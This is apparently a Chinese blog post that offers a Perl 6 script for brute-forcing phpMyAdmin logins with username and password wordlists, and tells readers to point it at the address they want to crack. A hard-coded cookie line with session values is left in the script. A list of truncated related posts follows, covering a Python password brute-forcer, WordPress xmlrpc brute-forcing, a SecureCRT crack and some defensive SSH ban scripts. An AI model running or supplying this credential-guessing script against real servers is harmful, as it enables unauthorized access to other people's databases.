perl6 单线程破解phpmyadmin脚本

use HTTP::UserAgent;
my $ua = HTTP::UserAgent.new;
my $url = ‘http://localhost/phpMyAdmin/index.php‘;#phpmyadmin登录网址

my @password = lines ‘password.txt‘.IO;#密码文件为password.txt
my @username = lines ‘username.txt‘.IO;
#$ua.cookies.set-cookie(‘Set-Cookie:phpMyAdmin=4vd2oee7t866juc4mhdgh1f2krfjrg19; pma_lang=zh_CN; pma_mcrypt_iv=fQrWZU8NfOY%3D; pmaUser-1=%2FvfpAdZXYMk%3D; ui_session=2986ad8c0a5b3df4d7028d5f3c06e936c5963aaa3a167b3ee0278412688165d0ddb6c3ff6bbb1205814c276b222aaa72f04e2e57eb2ebefe0b0f8471d877ef955; deviceid=1499131713523; xinhu_ca_adminuser=admin; xinhu_ca_rempass=1; xinhu_ca_adminpass=hh0bg0hd0wtt0hb0lb0bz0zn09‘);
for @username X @password -> ($username, $password) {
  say ‘Check: ‘~$username~‘ and ‘~$password;
  my %data = :pma_username($username),:pma_password($password),:server,:token<c772cbc73b0aa39a08e6b772e87ab224>;
  my $result = $ua.post($url, %data);
  if ($result.content ~~ /‘phpMyAdmin is more friendly with‘/) {
    say ‘Login Ok!‘;
    say ‘--> ‘~$username~‘:‘~$password;
    exit;
  }
}

运行效果如下所示:

这个 X 操作符实在太方便了。

里面的phpmyadmin改成你要破解的地址

username.txt / password.txt 改成你要的字典就行。

时间: 2024-11-09 17:39:34

perl6 单线程破解phpmyadmin脚本的相关文章

破解JS脚本加密

有时候一些html内容被加密了,我们看不到这些内容:) 下面选取了2种破解JS脚本加密的方式,大家看看 对于HTML加密或限制来说参考下面的方法www.82676666.com zzzevazzz 写的破大部分加密,显源码的东东,在地址栏输入: javascript:s=document.documentElement.outerHTML;document.write('');document.body.innerText=s; 对于JS加密来说参考下面的方法 最近很多人在问加密代码的问题.其实

SSH防暴力破解shell脚本

写的一个SSH的防暴力破解脚本. 原理是检测SSH连接日志,过滤登录失败的IP,超过登录次数就将其添加进hosts.deny文件中,限制其登录. 脚本如下: #! /bin/bash cat /var/log/secure|awk '/Failed/{print $(NF-3)}'|sort|uniq -c|awk '{print $2"="$1;}' > /root/black.txt DEFINE="10" for i in `cat  /root/bla

python 暴力破解密码脚本

以下,仅为个人测试代码,环境也是测试环境,暴力破解原理都是一样的, 假设要暴力破解登陆网站www.a.com 用户 testUser的密码, 首先,该网站登陆的验证要支持 无限次的密码尝试 假设testUser 的密码为 6位的纯数字 1:先长成 6位纯数字密码字典 import os pds=[] rg=range(0,10) for first in rg: for second in rg: for three in rg: for four in rg: for five in rg:

perl6检测网站CMS脚本

代码如下: use HTTP::UserAgent; use JSON::Tiny; my $check-url = 'www.baidu.com'; #say @*ARGS[0]; #检测命令行参数 if @*ARGS != 0 { $check-url = @*ARGS[0].lc; }else{ say 'no http/https, eg:'; say 'cms-check.p6 www.target.com'; exit; } my $url = 'http://120.24.44.1

防暴力破解sshd脚本

注意: 此脚本并不会定期清理之前添加到/etc/hosts.deny中的ip地址 此脚本运行在centos6的系统之上,如centos7需要的话,需要修改脚本声明(#!/usr/bin/bash); #!/bin/bash # while true do awk '/Failed password/{print $(NF-3)}' /var/log/secure | sort | uniq -c | awk '{if($1>=4) print $2}' > /tmp/reject.txt fo

防暴力破解小脚本

截取安全日志文件里登陆失败的IP来进行屏蔽,一旦有登陆失败记录的IP将无法再次连接,若要解除,可以将安全日志及其hosts_deny文件里的内容清空即可. #!/bin/bash cat /var/log/secure|awk '/Failed/{print $(NF-3)}'|sort|uniq -c|awk '{print $2"="$1;}' > /root/black.txt DEFINE="5" for i in `cat /root/black.t

Wordpress xmlrpc.php暴力破解漏洞

Wordpress xmlrpc.php暴力破解漏洞 wordpress是很流行的开源博客,它提供远程发布文章的方法,就是使用跟路径的xmlrpc.php这个文件,最近爆出xmlrpc漏洞,漏洞原理是通过xmlrpc进行认证,即使认证失败,也不会被Wordpress安装的安全插件记录,所以不会触发密码输错N次被锁定的情况.因此就可能被暴力破解,如果密码又是弱口令的话,就相当危险了.最简单的解决办法,就是删除xmlrpc.php这个文件.闲来无事,用java写了暴力破解的脚本,其实就是拿着各种用户

【原创】Linux下使用SecureCRT的方法:破解&amp;编码

1.下载SecureCRT软件 ubuntu64位:http://download.csdn.net/detail/cobps/7941145 ubuntu32位:http://download.csdn.net/detail/cobps/7941209 2.下载破解perl脚本: 网络资源,如果需要,可以到我的CSDN资源中寻找. securecrt_linux_crack.pl:http://download.csdn.net/detail/cobps/7941231 3.破解方法: 参照方

js的执行和调试

JavaScript 是指在浏览器运行的脚本 脚本就是剧本,在指定场景,特定时间,规定角色的对白,动作,情绪的变化 并且js是同步的,单线程的执行脚本 同步异步 js的运行是同步的, 运行完第一行才会运行第二行 遇到函数执行会进入函数里,等函数执行完再回到跳进去的行数 异步有计时器和AJAX 异步不会停在原地等返回,会立即执行下一行,等到异步有返回再暂停当前执行,临时接回异步回调,异步回调执行完再回到正常执行顺序 1. var a = "a": 2. b() 3. var c = &q